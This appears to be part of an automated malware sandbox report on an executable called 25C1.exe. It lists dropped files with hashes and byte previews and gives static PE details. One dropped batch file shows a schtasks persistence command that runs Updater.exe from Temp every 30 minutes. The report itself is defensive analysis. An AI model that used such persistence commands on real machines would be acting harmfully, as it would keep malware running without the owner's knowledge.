                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pqejrho.xhx.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sl2v43w.o3g.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aohwkluk.nw4.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cng3yfhf.w3g.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvxjbknt.yjf.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlw15r35.24w.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\INetC.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):25600
                                                                                          Entropy (8bit):5.391050633650523
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:pjj9e9dE95XD+iTx58Y5oMM3O9MEoLr1VcQZ/ZwcSyekMRlZ4L4:dAvE90GuY2tO93oLrJRM7Z4E
                                                                                          MD5:40D7ECA32B2F4D29DB98715DD45BFAC5
                                                                                          SHA1:124DF3F617F562E46095776454E1C0C7BB791CC7
                                                                                          SHA-256:85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
                                                                                          SHA-512:5FD4F516CE23FB7E705E150D5C1C93FC7133694BA495FB73101674A528883A013A34AB258083AA7CE6072973B067A605158316A4C9159C1B4D765761F91C513D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'9<.cXR.cXR.cXR.D.).jXR.cXS.6XR.D. .`XR.D.(.bXR.D...bXR.D.*.bXR.RichcXR.........................PE..L....T.[...........!.....@...j.......E.......P.......................................................................M..l...\F..d.......(.......................\.......................................................d............................text...\>.......@.................. ..`.data...dW...P.......D..............@....rsrc...(............R..............@..@.reloc..\............\..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\Temp\Task.bat

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):127
                                                                                          Entropy (8bit):4.777249987001707
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAuqLTVSRE2J5xAIEyrKBySKFS3:Ogas7SXEFAuqLTwi23faKS3
                                                                                          MD5:CA7ADC94E6F7EAD9381DF2DF27538858
                                                                                          SHA1:33BBC2D0E16C527A68DC164E276DDC895375A3F8
                                                                                          SHA-256:0547E622E5E458C83CBAD46059E6469C1ACD5B46B04A5F88F0AE45C703F0D44A
                                                                                          SHA-512:CC703535CD57156F9EA3E8D8E231B6F13276B99F9686ECC3FA6F70149A3F496FDF97F92C93CF01E1777A4CBB17CF5F59FA9F7B69CCC003FB2C79C9749B28E99D
                                                                                          Malicious:false
                                                                                          Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..

                                                                                          C:\Windows\Logs\CBS\CBS.log

                                                                                          Download File
                                                                                          Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):6291456
                                                                                          Entropy (8bit):5.253921897989971
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:KV5tI95VcEDi0v3lchlh6lRdKNhFk15N:KV5tI95Vr3lchlh6lRdKNhFk15N
                                                                                          MD5:DBE39743BD4872D4FD95A7BC82931EF3
                                                                                          SHA1:15F4C4E9BB4175AA507A475F926492E9D97775EC
                                                                                          SHA-256:17A50F94CA257C364B1C55EA7E62F8EFEDED12704F1AD4A6B71F909B90C6B340
                                                                                          SHA-512:73336EF4B94985D34FBA6187D81E8707F7BFA5BCF491FF49859AAE390E29DAF6B6EAEDCC974DFC714F66FD7604309779C8B258DAD60143E7581525C3C6F6442D
                                                                                          Malicious:false
                                                                                          Preview:.2023-10-03 09:57:33, Info CBS Starting TiWorker initialization...2023-10-03 09:57:33, Info CBS Lock: New lock added: TiWorkerClassFactory, level: 30, total lock:2..2023-10-03 09:57:33, Info CBS Ending TiWorker initialization...2023-10-03 09:57:33, Info CBS Starting the TiWorker main loop...2023-10-03 09:57:33, Info CBS TiWorker starts successfully...2023-10-03 09:57:33, Info CBS Lock: New lock added: CCbsWorker, level: 5, total lock:3..2023-10-03 09:57:33, Info CBS Universal Time is: 2023-10-03 08:57:33.888..2023-10-03 09:57:33, Info CBS Loaded Servicing Stack v10.0.19041.1940 with Core: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1940_none_7dd80d767cb5c7b0\cbscore.dll..2023-10-03 09:57:33, Info CBS Build: 19041.1.amd64fre.vb_release.191206-1406..2023-10-03 09:57:33

                                                                                          C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2224
                                                                                          Entropy (8bit):5.354902188542171
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:CWSU4xymI4RfoUeW+gZ9tK8NPdMs7u1iMugeC/ZaOUyu0lhV:CLHxvIIwLgZ2KlDOugg01
                                                                                          MD5:6BF5249E7EED52BA8B9AD9804C79C0BF
                                                                                          SHA1:E6DC63E4AD576367367B2656A2C0CBAB7185B0A2
                                                                                          SHA-256:8AC1B3611A35F9365DD66AD4C89E1D54DBCD8587CF1DCCAAD9A697973DE378A9
                                                                                          SHA-512:0704A28140E1F8005BE21D999DFC3E262CA3D3BDB1EDB171B0D830E8B4DE4262D67B74BCBF90E066340EA70C10A4CBB52F8648675F26B8D78AC13DEE7DF0139A
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_2xmkw3pn.xcy.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_arf1i54j.5qe.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_aswxj2q5.51e.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_bdck02qp.zxj.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_q0i4wzn3.jbg.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_rta0son3.13e.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_ts2p23jz.ghb.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_y0mzfpw5.nz4.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\gbfbijmbpkdw.sys

                                                                                          Download File
                                                                                          Process:C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):14544
                                                                                          Entropy (8bit):6.2660301556221185
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.9258891229768595
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:25C1.exe
                                                                                          File size:9'104'384 bytes
                                                                                          MD5:ceae65ee17ff158877706edfe2171501
                                                                                          SHA1:b1f807080da9c25393c85f5d57105090f5629500
                                                                                          SHA256:0dac8a3fe3c63611b49db21b2756b781cc4c9117c64007e0c23e6d3e7ca9ee49
                                                                                          SHA512:5214febfab691b53ca132e75e217e82a77e438250695d521dbf6bc1770d828f2e79a0070fd746a73e29acc11bf9a62ceafb1cf85547c7c0178d49a740ff9ae7b
                                                                                          SSDEEP:196608:drdPa3Pl8j7Ke1k6N25U0agbrT6NZ+t0ZGhsYN6mQwclTm2:d5P08KeDQtSb+t0ZEJQwcTm
                                                                                          TLSH:2596236E1F9B9523FD78CFBD1711722296078EBA0841F84493E1941F6932482F92BF76
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................. ... ....@.. .......................`............@................................

                                                                                          File Icon

                                                                                          Icon Hash:00928e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0xcb00ae
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x65BD14A7 [Fri Feb 2 16:13:27 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8b00600x4b.text
